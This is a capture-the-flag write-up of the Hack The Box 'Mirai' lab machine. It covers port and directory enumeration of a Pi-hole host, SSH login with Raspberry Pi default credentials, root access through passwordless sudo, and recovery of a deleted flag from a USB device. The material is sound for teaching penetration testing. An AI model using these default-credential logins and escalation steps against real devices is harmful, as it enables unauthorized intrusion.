Nmap
Port 80
Gobuster
Exploitation
SSH
Post exploitation
Privilege escalation: pi to root
Sudo
Finding root flag
Welcome to the Mirai writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Mirai
tags: HTB
Easy
Linux
OSCP
Platform: Hackthebox
Difficult: Easy
S.O.: Linux
Link: Click here
Enumeration
Nmap
To get started, we run a quick open ports scan.
$ nmap -p- -T4 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 16:19 CEST
Nmap scan report for 10.10.10.48
Host is up (0.096s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1536/tcp open ampr-inter
32400/tcp open plex
32469/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 61.16 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -A -Pn -p 22,53,80,1536,32400,32469 10.10.10.48
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-07 16:21 CEST
Nmap scan report for 10.10.10.48
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn´t have a title (text/html; charset=UTF-8).
1536/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 3.18 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 96.63 ms 10.10.14.1
2 96.80 ms 10.10.10.48
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.90 seconds
Port 80
The port 80 web seems empty. We are going to list directories.
Gobuster
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.48/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.48/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,zip,rar,tar,bak,php
[+] Timeout: 10s
===============================================================
2021/05/07 16:54:21 Starting gobuster
===============================================================
/admin (Status: 301)
/versions (Status: 200)
===============================================================
2021/05/07 16:59:07 Finished
===============================================================
Well, inside the admin
directory we find a Pi-hole
installation. Let's list again.
$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.48/admin/ -x php,txt,zip,rar,tar,bak -t 50 2>/dev/null
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.48/admin/
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,zip,rar,tar,bak
[+] Timeout: 10s
===============================================================
2021/05/07 16:56:04 Starting gobuster
===============================================================
/LICENSE (Status: 200)
/api.php (Status: 200)
/debug.php (Status: 200)
/help.php (Status: 200)
/img (Status: 301)
/index.php (Status: 200)
/list.php (Status: 200)
/queries.php (Status: 200)
/scripts (Status: 301)
/settings.php (Status: 200)
/style (Status: 301)
===============================================================
2021/05/07 17:00:51 Finished
===============================================================
I don't find anything interesting... We have seen that DNS port 53 is open but searching the web of the Pi-hole found and in the web of port 32400
I have not found any domain so we are going to add to our file /etc/hosts
the domain mirai.htb
and try accessing port 80 again.
This time we find a message that tells us that this domain is restricted.
<script src="http://pi.hole/admin/scripts/pi-hole/js/queryads.js"></script>
But if we look at the source code we can find a line where it refers to the pi.hole
domain so we are going to change the mirai.htb
domain to pi.hole
in our hosts
file.
And when accessing the domain... Surprise! we access the installation Pi-hole
that we had already found! 😂
After looking and listing for a long time without finding anything, knowing that Pi-hole
is a Raspberry Pi
installation we can look for default credentials for SSH
and test if they work.
And in this official post they indicate that the default user is pi
and the password is raspberry
.
Exploitation
SSH
And testing with these credentials, we are inside...
$ ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $ ls
background.jpg Desktop Documents Downloads Music oldconffiles Pictures Public python_games Templates Videos
pi@raspberrypi:~ $ cd Desktop/
pi@raspberrypi:~/Desktop $ ls
Plex user.txt
pi@raspberrypi:~/Desktop $ cat user.txt
CENSORED_FLAG
Post exploitation
Privilege escalation: pi to root
Sudo
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Really? directly root? I hope not!
pi@raspberrypi:~/Desktop $ sudo su
root@raspberrypi:/home/pi/Desktop# cd /root
root@raspberrypi:~# ls
root.txt
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Oh! yes we are root but we have to find the flag!! that's good!
Finding root flag
By listing the storage devices we can see that there is a secondary storage called sdb
.
root@raspberrypi:~# ls /dev/sd*
/dev/sda /dev/sda1 /dev/sda2 /dev/sdb
As we can see, the device is mounted on /media/usbstick
root@raspberrypi:~# mount | grep sdb
/dev/sdb on /media/usbstick type ext4 (ro,nosuid,nodev,noexec,relatime,data=ordered)
Let's see what it contains.
root@raspberrypi:~# cd /media/usbstick/
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root 1024 Aug 14 2017 .
drwxr-xr-x 3 root root 4096 Aug 14 2017 ..
-rw-r--r-- 1 root root 129 Aug 14 2017 damnit.txt
drwx------ 2 root root 12288 Aug 14 2017 lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Have you cleared my flag? clumsy...
Let's try to get it back.
root@raspberrypi:~# grep -a -C 500 'root.txt' /dev/sdb > /tmp/recover
root@raspberrypi:~# strings /tmp/recover
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
CENSORED_FLAG
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
Now, among the strings that it returns, we have the root flag.